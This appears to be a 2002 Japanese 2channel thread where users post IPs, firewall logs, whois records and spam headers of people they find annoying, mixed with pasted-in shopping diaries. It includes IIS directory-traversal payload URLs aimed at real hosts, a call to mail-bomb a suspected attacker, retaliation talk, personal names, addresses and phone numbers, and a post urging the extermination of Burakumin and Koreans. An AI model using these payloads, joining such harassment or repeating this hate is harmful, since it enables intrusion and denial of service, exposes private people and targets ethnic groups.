ウザイやつのIP及び情報はここに。Part2

きょうのウザイ君をどうぞ！
まずは・・・
ファイアウォールから吐き出されるログを、神経質に気にする小心者の漏れ(;´Д`)

前スレ
http://pc.2ch.net/test/read.cgi/sec/1000359447/l50

1000

★重要告知★
『 OKWeb 』 及び 教えてGoo は最悪だ !
利用する奴ははっきり言って馬鹿の象徴 !!
馬鹿の証明しているに過ぎない !!
"OKWeb" を利用すると　頭が変になり、馬鹿になる !!　気をつけろ !!!
　それにOKwebを利用するだけで『ウィルス』に感染してしまうから
絶対利用はするな !!

新スレ
http://pc.2ch.net/test/read.cgi/sec/1009446905/l50

IP: 210.83.135.107
Node: DPDWB
Group: WORKGROUP
MAC: 00055D090669
DNS: DPDWB

どこからきたか分かりやすいので、
できるだけLookupして(　ﾟДﾟ)ﾎｽｨ

test

Received: from smtp13.odn.ne.jp ([211.3.41.27]) by t-mta2.odn.ne.jp
with SMTP
id <[email protected]>;
FROM:[email protected]

[Tcp/Ip:210.136.161.38]
[Brows:DoCoMo/1.0/N502it/c10]

今日は福井で大雪だった
2002年1月8日(火) 雪／雪


今日は福井へ打ち合わせがあった。
年始にかけて大雪が降ったと聞いていましたが、いや見事な雪景色でした。
流石に市内はそうでもないのですが、それでも到着してすぐに
大雪が、それも横嬲りで降る有様でした。
結局、お客さんの所をでても、大雪状態のままでした。
もしかしたら、一晩降り続けるかもしれませんね。

さて、今年一年、一応の目標というのを考えてみた。
あまりにパーソナルな部分をこの場で言うのは憚りがあるので、
お買い物関係に関して言うと
１：服に関しては春夏物のスーツ、秋冬物のスーツの２着をオーダーする。
２：ワイシャツ系に関しては、今年は６枚オーダーする。
　…と言うより今の今までよくシャツが保ってくれていた。ここへ来て
　　だいぶぼろになってきたのでその交換要員である。
３：靴はEDWARD-GREENのMy-Sizeで昨年購入した分の、逆パターンでオーダーする。
　　ついでに、来年に向けて恐らくはまた11月にあるであろう、オーダー会にて
　　オーダーを行う。靴に関してはこれ以上の購入をしない。
４：カジュアル物は基本的にUNIQLO、無印といった物で済ませつつ、ADIDASの
　　様なスポーツ物を買う。単純に言えばそれ以上のカジュアル物は買わない。
５：セールに関してはきちんと予算を立てて買う。ただしぴんとこない場合は
　　買わない。

１：に関して言えばスーツは基本的に買う物ではなく作る物なので、これ以上は
買わない、作らない、と言うこと。ただし秋冬の場合、スーツではなく
ジャケットに成ることもあり得るかも。所謂プレーンな紺のジャケットが
冬物に関しては無いので、そういう部分の穴埋めをするかもしれませんね。
ま、どっちにしてもその程度しか「重衣料」は作らない。
２：に関しては今、持っているボレリ、フライ、ARISTCRATICOのシャツが
そろそろ駄目になってきているので（生地が縮むとかそういう部分もあるけれど
単に袖の擦り切れが酷いのと、通年で着るようになったので、夏場のダメージが
結構でるようになってきたのです。それでも実用７年ももてば御の字、ですな）
新しいのをDMGさんで、LES-LESTONのシャツをオーダーするつもりです、って
もう２着オーダー予約をいれましたが（笑）。

３：に関しては去年が靴の大当たりで買いまくりましたので、今年は止めようと。
本当言うとALDENのモディファイV-TIPのカブトムシ色が欲しいのですが、
余程値段が急騰しない限りはまだまだ取り扱いはありますので。他に欲しい
物が無い訳じゃありませんが、SIZEの事、FITTINGの事を考えると、やはり
EDWARD-GREENのMADE-TO-ORDERで作った方が後々満足度が違うかな…と。
４：カジュアルと言いましても、実はそれほどカジュアルに興味がある訳じゃなし
せいぜい夏場のＴシャツかカットソー、それにスニーカーくらいです。
スニーカーにしても、スポーツジムで使っていた物を下履きに持っていきますしね。
ジーンズもそうそう買い換える物ではないし。チノ−ズはUNIQLOや無印で十分ですし
唯一、冬場のアウターでナイロン系の暖かそうな物が欲しいくらいで、
考えてみればここ数年、カジュアルとは無縁の状態を過ごしているような…。
５：セールに関してもここ最近はセールで良い物をゲットした、と言うのが少なく
せいぜい、スメドレーのニットで良いのを買ったか、ネクタイで良いのを買ったか、
マレにPAUL-SMITH-COLLECTIONで良いのがでたので買ったくらいですね。
お店にはよく行くのですが、結局買わない、居てるだけの事の方が多いですし、
行くお店も大分、絞り込まれてきてますので、セールという物にだんだんご縁が
無くなってきているようです。昨年は新年から横浜に行く機会が多く、
ＢＮＹなどのセールにかち合う場面もあったのに、結局何も買っていないんですね。
なんかだんだん自分の買う物が絞り込まれてきているのか、
それとも自分の好みが世間に迎合しないのか…。

まぁ、どっちにしろ買い物に関しては計画した中でしますよ、てことです。

今年の最大の目標は「物欲様を黙らせる」事だったりして。

agent.lisco.com

DRS Whois Server V 1.0.1 (Reacto.COM Ltd)

Domain
======
KNEXP.COM (DOM-169386)
Takashi Kawabata 8-13-10 Nishishinjuku Nittou haitu 102 Shinjuku-ku Tokyo 160-0023 Japan

Created : January 4 2001.
Last Updated : April 4 2001.
Expires : January 4 2003.

Admin Contact
=============
(NIC-125284)
Takashi Kawabata ([email protected])
Shinjuku-ku Tokyo 160-0023 Japan
Phone : , Fax :

Technical Contact
=================
(NIC-1000)
GlobalMediaOnline INC. ([email protected])
GlobalMediaOnline INC. 26-1 Sakuragaoka - Cerulean Tower Shibuya-ku Tokyo 150-8512 Japan
Phone : +81-3-5456-2555, Fax : +81-3-5456-2556

Nameservers
===========
NS3.SPHERE.AD.JP
NS4.SPHERE.AD.JP

Korea Network Information Center

12.225.225.35
これどこ？

All net IP searchでもでてこないんだけど・・・。

では私も書かせて貰います。

[email protected]

この野郎はこっちのメールサーバにTROJ_GOP.196.DR型ウイルスをbcc:で送りつけ、それが
発症させて機密情報を盗み、[email protected]の送信元で回収しようなどと考えているチャンコロ
です。

新年に入って何度か攻撃してきてるけど、足跡を消すためにOCNを踏んだり、韓国のNICが
管理するIPを盗んだり、都内某企業の使われていないIPを盗んだりして入ってきやがります。

匿名ジャンクメールを大量に送信してやっつけるのに協力してください。
ちなみにこちらは、昨日の夜に2GB×50通を送信してあげました。

> 匿名ジャンクメールを大量に送信してやっつけるのに協力してください。
いやだ。

((((（;ﾟДﾟ）)))))ｶﾞﾀｶﾞﾀ

くしゃみが止まらないんですが

[email protected]

>>17
AT&T ITS (NET-ATT)

IP: 62.211.0.14
DNS: r-mi214-8-14.tin.it
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: FAUSTO MARCHETT
MAC: 444553540000

>>24
イタリーもたまに来る来る

209.90.125.212
こいつが毎回ブラックアイスにツンツンしてくるんだけどIPサーチ以外での
情報求む。せっかくだからなんかお返ししたいんだけど。

>>26
IP分かってお返しできないヤツは何もできないヤツ

>>27
だからおせーてって言ってんのに・・・。

27＝IP分かってお返しできないヤツ

>>29=IPも分からないヤツ

みなさん、こんばんは。
これまでの買いすぎからか、またまたヨーロッパ往復分のマイルがたまっていることがわかりました。
アメックスのプラチナカードでも買い物をしていたので、ポイントをエールフランスのフリークエンスプラスに移行してもらったら、ぎりぎりでビジネスクラスが使えるマイルになっていることがわかりました。
ということで、この夏か、年末年始にフランスに行くことは、もう決定です。
夏は、爆買いツアーの可能性もある？ので、ほぼスケジュールが決まっている次回の年末年始を、もうリザーブしようかな。
なんとも気の長い話ですが、ちょっとうれしいのです。
浮いたお金で、また靴が買えますし・・・（笑い）。
でも、さすがに打ち止め気味なので、コンピュータオーダーのウェストン・プレステージクラブに続いて、ジョンロブ・パリかベルルッティのビスポークに挑戦したいなぁとおぼろげに考えています。
ただ、靴ではありませんが、パリのサンジェルマン・デュ・プレで見た「アルニス」のジャケットがとても印象的でもあって、コム・デ・ギャルソンから少し浮気をしようかなとも考えています。
う〜、いずれにしても、お金がかかりすぎます・・・。
日本にいる時は、みなさんに惑わされずに、質素に生きて行こうと心に誓いました（自信なし）。

ExperiMental (NETBLK-FIBE-20990125208)
1455 S State Street
Orem, Utah 84057
US

Netname: FIBE-20990125208
Netblock: 209.90.125.208 - 209.90.125.223

Coordinator:
Livingston, Lane (LL368-ARIN) [email protected]
8012239939

cloud.prohosting.com
209.90.125.212

http://209.90.125.212/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
http://www.em5000.com/[email protected]
http://www.em5000.com/[email protected]

>>23
レスありがとう。
AT＆Tか。
なんか５分間に１３回もアタックかけられたよ。
しかも、なぜかALL IP SEARCHでもでてこないし（PM３時ごろ）
今、もう一度検索しなおしたら、AT&Tってでてきた。
昼間鯖がしんでいたのかな？

OS Server Last changed IP address Netblock Owner
BSD/OS Apache/1.3.19 (Unix) mod_throttle/3.1.2 29-Sep-2001 209.90.125.212 ExperiMental
BSD/OS Apache/1.3.19 (Unix) 24-Sep-2001 209.90.125.212 ExperiMental

TISインターネットサービスさん、何か御用でしょうか？

初心者なりにとりあえずゾーンアラーム入れたんだけど、
毎日、しかも必ず韓国から進入してこようとされてます。

これって日常茶飯事なんでしょうかねえ。

勘違い

>>32,34
マジで感謝します。日本人だったのね・・・。

うざいスパマー

Domain
======
LIME-JP.COM (DOM-148141)
Sonny Tessio SP228 (Shibuya Cross Tower) 2-15-1. Shibuya Shibuya-ku Tokyo 150-8944 Japan
Created : December 6 2000.
Last Updated : December 10 2001.
Expires : December 6 2002.
Admin Contact
=============
(NIC-52354)
Sonny Tessio ([email protected])
Sonny Tessio SP228 (Shibuya Cross Tower) 2-15-1, Shibuya Shibuya-ku Tokyo 150-8944 Japan
Phone : +81-3-1584-2395, Fax :
Technical Contact
=================
(NIC-52354)
Sonny Tessio ([email protected])
Sonny Tessio SP228 (Shibuya Cross Tower) 2-15-1, Shibuya Shibuya-ku Tokyo 150-8944 Japan
Phone : +81-3-1584-2395, Fax :

>>39
＞Sonny Tessio
こいつたしか有名なスパマーですよね？

http://www2g.biglobe.ne.jp/~stakasa/spam/fruits-jp.html
これにいろいろ書いてあるな。

ドメイン取ってるんだったら、入金の経路から割り出せないのかなぁ。

BlackICEでひかっかった韓国人ハッカー？
IP: 203.251.6.152
Node: MONKEY
Group: MONKEYS
NetBIOS: __MSBROWSE__
MAC: 0050CE194C0E
DNS: MONKEY

NetBusが入っているマシンかどうか調べにきやがった。

1, 61.32.37.130
1, 61.32.113.205
1, 61.251.171.22
1, 61.188.69.20
1, 61.188.65.8
1, 61.188.23.80
1, 61.187.62.93
1, 61.187.219.138
1, 61.184.99.203
1, 61.182.20.145
1, 61.182.100.195
1, 61.180.83.90
1, 61.180.100.131
1, 61.178.103.19
1, 61.176.192.252
0, 61.176.135.121
1, 61.174.133.185
1, 61.171.74.63
1, 61.168.169.41
1, 61.168.14.198
1, 61.166.78.65
1, 61.166.244.37
1, 61.163.219.150
1, 61.163.218.194
1, 61.163.178.253
1, 61.161.4.233
1, 61.160.8.60
1, 61.155.204.80
1, 61.154.3.24
1, 61.151.251.136
1, 61.147.8.201
1, 61.146.128.66
1, 61.145.1.66
1, 61.144.82.220
1, 61.144.77.108
1, 61.144.192.4
1, 61.144.154.129
1, 61.143.227.196
1, 61.143.10.76
1, 61.141.GD.CN
1, 61.137.158.14
1, 61.137.123.46
1, 61.134.35.89
1, 61.133.64.72
1, 61.131.156.28
1, 61.129.223.204
1, 61-222-3-178.HINET-IP.hinet.net
1, 61-222-208-202.HINET-IP.hinet.net

すげぇ数だな。

本日の日記はお休み　日時：Thu Jan 10 08:11:53 JST 2002
昨日水曜、昼前にアップした２本目の臨時日記を読んでいない人はそちらへ。
私が本気になるかも知れないということを疑っている人物がいるとしたら、そ
りゃ甘いということを警告しておきます。犯罪者心理は、つまる所、ある一線
を越えた後に、「どうってことは無い、この程度のことで警察が動くわけはな
い、自分は絶対に捕まらない」と錯誤し、安全の妄想を膨らませていく部分で
墓穴を掘る。いいかい、康夫ちゃんにエロ写真をメールする程度のことで捕ま
ったガキだっているんだよ。犯罪者として真に優れた悪党は、ネットワークな
どという、そこいら中に証拠をばらまくようなツールでは犯罪は犯さない。指
紋と戸籍謄本を、街角を曲がる毎に郵便箱に放り込みながら窃盗に押し入るよ
うな愚かな行為だ。もし田中康夫絡みでこんなことをやっている輩がいるとし
たら、私は、権力と闘うことに躊躇いを感じるような男じゃないということを
アピールしておきます。家族の守り方も心得ている。それこそ燃えこそすれ、
筆が鈍るなんてことは無い。

［ 61.200.48.3 ］
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.200.48.0-61.200.51.0
b. [ネットワーク名] TMC-NOC-3
f. [組織名] 東京めたりっく通信株式会社
g. [Organization] Tokyo Metallic Communications Corp.
m. [運用責任者] NK1321JP
n. [技術連絡担当者] NK1321JP
p. [ネームサーバ] ns.metallic.ad.jp
p. [ネームサーバ] ns.metallic.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/02
[返却年月日]
[最終更新] 2001/03/02 17:13:43 (JST)
[email protected]

まだ、東メタなんてあったんだ。

"荒木智幸" <[email protected]>
SＡＫＡＩ <[email protected]>
"G7サービス" <[email protected]>

くそったれ、変なところにメアドてんそうされた

はくしょいばろちきしょい

postfix/smtpd[6438]: connect from dialup-216-41-73-117.gis.net[216.41.73.117]
postfix/smtpd[6438]: lost connection after CONNECT from dialup-216-41-73-117.gis.net[216.41.73.117]
postfix/smtpd[6438]: disconnect from dialup-216-41-73-117.gis.net[216.41.73.117]
Dec 30 16:13:48 hoge postfix/smtpd[4261]: connect from dialup-63-209-233-99.gis.net[63.209.233.99]
postfix/smtpd[4261]: 48BCC14A1: client=dialup-63-209-233-99.gis.net[63.209.233.99]
postfix/smtpd[4261]: reject: RCPT from dialup-63-209-233-99.gis.net[63.209.233.99]: 554 <[email protected]>: Recipient address rejected: Relay access denied; from=<[email protected]> to=<[email protected]>
postfix/smtpd[4261]: lost connection after RCPT from dialup-63-209-233-99.gis.net[63.209.233.99]
hoge postfix/smtpd[4261]: disconnect from dialup-63-209-233-99.gis.net[63.209.233.99]

IPアドレス見ても何もできないからとりあえず数は多めに書くという....

IP: 210.205.214.116
Node: JJJ-M4KKN3GS864
Group: WORKGROUP
NetBIOS:
__MSBROWSE__

DNS: s210-205-214-116.thrunet.ne.kr
MAC: 00E0295AD468

http://www03.u-page.so-net.ne.jp/wc4/melarbe/index.html

61頭っＴ多いよね。調べるとカンコックやチュウゴックン。

部落民とチョンを殲滅

Received: (qmail 13305 invoked from network); 10 Jan 2002 06:21:09 -0000
Received: from req4.freeml.com (211.125.95.64)
by jppima4f.lycos.co.jp with SMTP; 10 Jan 2002 06:21:09 -0000
Received: (qmail 7979 invoked by uid 7791); 10 Jan 2002 06:21:17 -0000
Received: from doo.local.freeml.net (HELO freeml.com) (192.168.100.253)
by req4.local.freeml.net with SMTP; 10 Jan 2002 06:21:17 -0000
Delivered-To: [email protected]
Received: from req5.freeml.com (bl-p3.freeml.com [211.125.95.97])
by ml2.freeml.com (Postfix) with SMTP id AC62F4E48E
for <[email protected]>; Thu, 10 Jan 2002 15:21:07 +0900 (JST)
Received: (qmail 16637 invoked by uid 7791); 10 Jan 2002 06:21:07 -0000
Received: from doo.local.freeml.net (HELO www.freeml.com) (192.168.100.253)
by req5.local.freeml.net with SMTP; 10 Jan 2002 06:21:07 -0000
Received: (from freeml@localhost)
by www.freeml.com (8.11.2/3.7W) id g0A6L6B26766;
Thu, 10 Jan 2002 15:21:06 +0900
Date: Thu, 10 Jan 2002 15:21:06 +0900
Message-Id: <[email protected]>
To: [email protected]
From: [email protected]
X-Mailer: FreeML Web Mailer ver 0.4
X-POSTED-IP: 202.221.12.107
Mime-Version: 1.0
Subject: [delete:3019] Re: =?ISO-2022-JP?B?GyRCJDMkMyReJEckZCRrGyhC?=
=?ISO-2022-JP?B?GyRCJCshKRsoQg==?=
Content-Type: text/plain; charset=iso-2022-jp
Content-Transfer-Encoding: 7bit
Reply-To: [email protected]
X-Ml-Name: delete
X-Ml-Count: 3019
Sender: [email protected]
Precedence: list
Delivered-To: FreeML mailing list [delete]

61.207.214.197

ノートン入れて初の攻撃

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 61.36.146.64 - 61.36.146.127
netname: NETFORYOU4008247D
descr: NETFORYOU INTERNET PC ROOM
descr: PC Game Plaza User in
descr: Kwonsun-gu Suwon-shi KYONGGI
country: KR
admin-c: MY121-AP
tech-c: DB50-AP
notify: [email protected]
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20010924
source: APNIC

role: DACOM BORANET
address: DACOM Bldg., 706-1, Yoeksam-dong, Kangnam-ku, Seoul
phone: +82-2-6220-7755
fax-no: +82-2-6220-0706
e-mail: [email protected]
admin-c: TH45-AP
tech-c: EJL1-AP
nic-hdl: DB50-AP
remarks: IP address administrator group of NIC team, DACOM Corp.
notify: [email protected]
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20011009
source: APNIC

person: MIJUNG YIM
address: 477 14 Seryu3-dong Kwonsun-gu Suwon-shi
address: KYONGGI Korea
country: KR
phone: +82-31-224-1257
e-mail: [email protected]
nic-hdl: MY121-AP
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20010924
source: APNIC

これなんすか？
The firewall has blocked Internet access to your computer
(NetBIOS Name) from 61.36.146.98 (NetBIOS Name).
だったんですけど

>>59
NetBIOS NameService(port137)をポートスキャンされただけ。
ブロックしたので問題なしです。

あと、上の長いの（WHOIS）は貼っても無意味なのでやめてね。
相手の個人情報じゃなくて、プロバイダ、相手ドメインなどの情報なので。

ひろゆきに情報求む!!!
ログに残ってるIP全部公開してくれ
２chネラー全部ウぜぇー

うざい。
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.209.0.0-61.209.191.0
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
m. [運用責任者] YN234JP
n. [技術連絡担当者] YN234JP
p. [ネームサーバ] ns2.odn.ne.jp
p. [ネームサーバ] ns4.odn.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/16
[返却年月日]
[最終更新] 2001/11/07 15:49:42 (JST)
[email protected]

>>62
氏ね。お前がウザい。

whois でISPの情報貼りつけてる人は、なんか意味あんの？

>>64
たぶん意味分からずにはってるんだと思ぅ。　(>>62これとか・・)
正直コピペ荒らしといっしょですぅ。

>>39は悪さしてるヤツのドメイン情報なのでOKかな。

>>39のドメ情報にあるてしおは札付きの糞
>>45見覚えのあるＩＰ多い（ｗ
　　俺は中国と韓国はフィルタリングで全ＩＰあぼ〜ん設定。

さっきアクセスしてきたヤツ
195.232.50.10　(fra-tgn-oyr-vty10.as.wcom.net)

FTPで見てみたら丸見えなんだけど・・・
ftp://195.232.50.10/

さっきアクセスしてきたんで晒しとく
202.221.32.13

pc24164.ztv.ne.jp

ウザッ

61.207.155.179[OCN丸の内接続]
IIS立てただけでそれっきりのﾊﾞｶｰ会社ﾊｹｰﾝ
しっかりnimdaに感染してるし．．こういうセキュリティガラ空き野郎に限って
ハクられると大騒ぎする悲惨なタイプ。どこにでも好きなとこ逝ってくれ！
それと、バックトレースかけられたくらいで回線切る奴はアタックすんなよボケ。

kkgw002225.catv.ppp.infoweb.ne.jp

なんとかして。

http://kkgw002225.catv.ppp.infoweb.ne.jp/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

IANA (NET-RESERVED-59)
Internet Assigned Numbers Authority
4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: RESERVED-59
Netblock: 59.0.0.0 - 59.255.255.255

Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) [email protected]
(310) 823-9358

Record last updated on 14-Oct-1999.
Database last updated on 13-Jan-2002 02:31:08 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

この意味をおしえてください。馬鹿でゴメン
このログがパソに残ってたんですけど

2002/01/13 4:33:32 (HTTP) 211.75.225.1 (TCP Port 3992)
2002/01/13 19:30:58 (HTTP) 206.40.176.151 (TCP Port 46792)
2002/01/14 1:07:02 (HTTP) 211.99.112.11 (TCP Port 2733)
2002/01/14 7:07:54 (HTTP) 202.99.176.28 (TCP Port 62813)

何か用？
悪いけど今Apache起動してないの　ごめんね

inetnum: 202.114.128.0 - 202.114.143.255
netname: TJMU-CN
descr: Tongji Medical University
descr: Wuhan 430030
descr: Hubei Province
country: CN
admin-c: LH2-CN
tech-c: LH2-CN
notify: [email protected]
changed: [email protected] 960430
source: APNIC

person: Longsen Huang
address: Computer Center
address: Tongji Medical University
address: Wuhan 430030
address: Hubei Province
address: P. R. China
phone: +86 027 5865811 ext.2632
fax-no: +86 027 5861050
e-mail: [email protected]
nic-hdl: LH2-CN
notify: [email protected]
notify: [email protected]
mnt-by: MAINT-NULL
changed: [email protected] 19951021
source: APNIC

From:"SaveBig"< [email protected] >
To: [email protected]
Subject:Get the Credit You Deserve!
Date:****
Received:from [207.250.144.213]by sparklist.com
with ESMTP id leave-savebig-2158367U
From [email protected]
List-Unsubscribe:
< mailto:[email protected] >
-----
You are currently subscribed to savebig as: [email protected]
To unsubscribe send a blank email to mailto:[email protected]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.237.128.0-210.237.137.0
b. [ネットワーク名] KITANET
f. [組織名] 北ケーブルネットワーク株式会社
g. [Organization] Kita Cable Network Corp
m. [運用責任者] AK521JP
n. [技術連絡担当者] AK521JP
p. [ネームサーバ] catv00.kitanet.ne.jp
p. [ネームサーバ] dns2.odn.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 1999/01/26
[返却年月日]
[最終更新] 2000/08/09 19:33:18 (JST)
[email protected]

久しぶりに日本人が釣れました。

>>77
WHOIS貼るな。ヴォケ。

pc24164.ztv.ne.jp

>>77
だからさ。なんでプロバイダの情報貼りつけてんの？
どういう意味があるのか教えてよ。

しかも　＞久しぶりに日本人が釣れました。＜コレ何よ？

>>73 も意味がわからんなら貼りつけるなヨ。
ログに残ってようがそんなのほっとけって。
しかも IANA のwhoisなんて何の意味もない。

。。。

From:VistaPrint< [email protected] >
To: [email protected]
Subject:Get 250 full-color business cards for free
Date:****
Received:from[209.114.218.164] by optin-global.net with ESMTP id [email protected]
From [email protected]
X-Sender: optin-global.net
Errors-To: [email protected]
Complain-To: [email protected]

You received this email because you signed up at one of Optin Global's websites or you signed up with a party that has contracted with Optin Global. To unsubscribe from our email newsletter, please visit

http://opt-out.optin-global.net/[email protected]
http://opt-out.optin-global.net/[email protected]
http://opt-out.optin-global.net/[email protected]
http://opt-out.optin-global.net/[email protected]

携帯に不在着信あったのでかけなおしたら出会い系のアナウンスが流れる。
かなりしつこくて腹が立つ！！迷惑メールが厳しくなったから、これからは
こういうのが増えるんだろうな。ちなみに、こいつ→　06-6305-1479

43.231.253.199
うちはプロキシサーバを立ち上げていません。ゴラァ！(`Д´)

http://bom-ba-ye.com/a.cgi?netapp=1

私、待つわ。

>87
私、松野

The firewall has blocked Internet access to
static-proxy.nrt.cp.net (211.128.0.29) (HTTP)
from your computer [TCP Flags: S].

クリスタルパパパリカ〜〜カカ（￣ー￣）ﾆﾔﾘ

>>89
ファイアウォールはあなたのコンピューターから
[TCPコネクションフラグ:SYN]による
static-proxy.nrt.cp.net (211.128.0.29) (HTTP) への
インターネットアクセスを閉鎖しました。

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 211.172.0.0 - 211.199.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20000607
changed: [email protected] 20010606
source: APNIC

person: Host Master
address: Korea Network Information Center
address: Narajongkeum B/D 14F, 1328-3, Seocho-dong, Seocho-ku, Seoul, 137-070, Republic of Korea
country: KR
phone: +82-2-2186-4500
fax-no: +82-2-2186-4496
e-mail: [email protected]
nic-hdl: HM127-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010514
source: APNIC

inetnum: 211.177.6.0 - 211.177.6.255
netname: HANANET-DONGJAK-KR
descr: HANARO Telecom
descr: 1445-3 Seocho-Dong Seocho-Ku
descr: SEOUL
descr: 137-728
country: KR
admin-c: IS1855-KR
tech-c: SH3222-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020114
source: KRNIC

person: Inyup Sung
country: KR
phone: +82-2-106
fax-no: +82-2-6266-6483
e-mail: [email protected]
nic-hdl: IS1855-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020114
source: KRNIC

portmap[1438]: connect from 210.178.12.111 to dump():
request from unauthorized host

fingerしたらバカがいたよ。

ｈｈｈ

The firewall has blocked Internet access to
static-proxy.nrt.cp.net (211.128.0.29) (HTTP)
from your computer [TCP Flags: S].

国がわかるだけ・

強烈にクラックされとりますな。
被害者多数。

なに？ここのスレに書き込めば復習でもしてくれんの？

211.249.36.26

踏み台が判る。

>>99
そんな馬鹿居るわけないでしょ。

211.226.172.143

laptop9.bib.uni-wuppertal.de

132.195.79.137

って野郎がトロイの木馬に乗ってきた

（　´_ゝ`）

ふ〜ん

Received: from rcpt-expgw.biglobe.ne.jp (210.147.6.213) by [email protected] with SMTP; ***
Received: from smtp-gw.biglobe.ne.jp by rcpt-expgw.biglobe.ne.jp (8.9.3+3.2W/3.7W) with ESMTP id MANKO_931!!! for <[email protected]>; Moon, 32 USA 3001 25:61:70 +2500
From: [email protected]
Date:Moon, 32 USA 3001 25:61:70 +2500
X-Biglobe-Sender:< [email protected] >
Received: from MUSASHI88 (211.18.239.190 [211.18.239.190]) by smtp-gw.biglobe.ne.jp id PUSSYJENNA;Moon, 32 USA 3001 25:61:70 +2500
Message-ID: <bijlogyiokcty78645jiog@MUSASHI88>
To: <[email protected]>
Subject: SE45-75万 PG40-50 PCサポート2 0-45待機時支給 社保有
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-2022-jp"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
-----
突然メール失礼いたします。
ＳＥ、ＰＧ、ＯＰ、PCサポート及びAccess,Excel,Wordの技術者を募集しております
ご不要の方は削除されるとともにお詫び申し上げます。
・ S.E. 45〜75万円／月, P.G. 20〜45万円／月, O.P. 20〜40万円／月, PCサポ
ート20〜45万円／月です
・残業は別途支給いたします
・仕事がないときも給与は支払います
・引越希望者は、敷金、礼金を無利子で貸し付けます
・勤務地は都内近郊です
・作業形態としては派遣です
・以上のことを双方合意した内容を仕事を始める前に契約書として結びます
・応募資格は日本国籍を有する者、在日韓国人、それに準ずる者で経験が半年以
上ある人
興味ある方はメールを下さい
[email protected]
即稼働が出来ない方は、登録だけでも構いません
お気軽にお問い合わせ下さい
(株)武蔵情報システム
[email protected]
SE45-75万 PG40-50 PCサポート20-45待機時支給 社保有
P.S)・ Excel,WordについてはVBAの開発経験がなくとも、採用は可能です
・ 同時に新人（未経験者）も募集しております
ただ、両方ともに、雇用条件が異なりますので、興味がある方はメールく
ださい

　

ごめん、全然意味が分かんないんだけど。
どこがどうなのか教えてくれる？(ﾟｰﾟ*)

うちのBBSに127.0.0.1からやってくるお客が多いけど、アダプタアドレスが変わっていなかったりする。案外こんなもの。

ヽ(´Д`)ﾉﾎﾞｯｷﾅｴ･･

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 210.81.163.64 - 210.81.163.95
netname: E-CLASSIS-INC-JP
descr: E-CLASSIS, Inc.
country: JP
admin-c: TA18-AP
tech-c: TA18-AP
mnt-by: MAINT-UUNET-JP
changed: [email protected] 20010611
source: APNIC

person: Tazuko Atsuta
address: Network Operations, UUNET Japan
address: Odakyu Southern Tower
address: 2-2-1 Yoyogi, Shibuya-ku,
address: Tokyo 151-8583 Japan
phone: +81-3-5365-2576
fax-no: +81-3-5365-2590
e-mail: [email protected]
nic-hdl: TA18-AP
mnt-by: MAINT-JP-UUNET-OPS
changed: [email protected] 20000521
source: APNIC

202.96.70.253

inetnum: 61.70.128.0 - 61.70.255.255
netname: GIGAMEDIA
descr: Hoshin Gigamedia Center Inc.
descr: Cable-Based ISP in Taiwan.
country: TW
admin-c: CWT1-AP
tech-c: JL126-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-HOSHIN-TW
changed: [email protected] 20010726
source: APNIC

person: Chen-Wen Tarn
address: Hoshin Gigamedia Center, Inc.
address: 4F, 57, Tung Hsing Rd.
address: Taipei, Taiwan
country: TW
phone: +886-2-8768-3789 ext.2001
fax-no: +886-2-8768-2987
e-mail: [email protected]
nic-hdl: CWT1-AP
mnt-by: MAINT-HOSHIN-TW
changed: [email protected] 20010824
source: APNIC

person: Johnson Liu
address: Hoshin Gigamedia Center, Inc.
address: 4F, 57, Tung Hsing Rd.
address: Taipei, Taiwan
country: TW
phone: +886-2-8768-3789 ext.2303
fax-no: +886-2-8768-2987
e-mail: [email protected]
nic-hdl: JL126-AP
mnt-by: MAINT-HOSHIN-TW
changed: [email protected] 20010824
source: APNIC

inetnum: 61.32.87.128 - 61.32.87.191
netname: MIRACLE4000965D
descr: Miracle Sm
country: KR
admin-c: IL70-AP
tech-c: DB50-AP
notify: [email protected]
